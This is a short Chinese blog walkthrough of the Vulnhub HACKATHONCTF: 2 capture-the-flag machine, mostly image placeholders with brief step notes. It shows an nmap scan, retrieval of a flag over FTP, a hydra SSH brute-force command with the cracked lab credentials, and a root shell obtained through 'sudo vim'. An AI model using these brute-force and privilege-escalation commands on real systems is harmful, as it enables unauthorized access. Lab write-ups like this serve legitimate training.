title: 'Vulnhub-HACKATHONCTF: 2'
abbrlink: 9fb7446f
date: 2022-11-30 09:03:08

tags:

描述

nmap信息收集

image-20221130092332696

kali  192.168.169.220
靶机  192.168.169.230
  • nmap扫描靶机

image-20221130092532813

21 80 7223 

访问80

image-20221130093012339

访问21

image-20221130093232284

查看文件

image-20221130093350991

₣Ⱡ₳₲{7e3c118631b68d159d9399bda66fc684}

image-20221130093508823

目录检举

image-20221130094105708

访问

robots.txt

image-20221130094224594

image-20221130094236374

happy

image-20221130094311295

image-20221130094323069

ssh

爆破

用户名 : hackathonll
密码   : ftp看到的 word.dir
```
hydra -l hackathonll -P word.txt 192.168.169.230  ssh  -s 7223

image-20221130095158181

登录

[7223][ssh] host: 192.168.169.230   login: hackathonll   password: Ti@gO

image-20221130095642022

提权

image-20221130095734435

vim提权

image-20221130095925021

sudo vim -c ':!/bin/sh'

image-20221130100022056

image-20221130100058462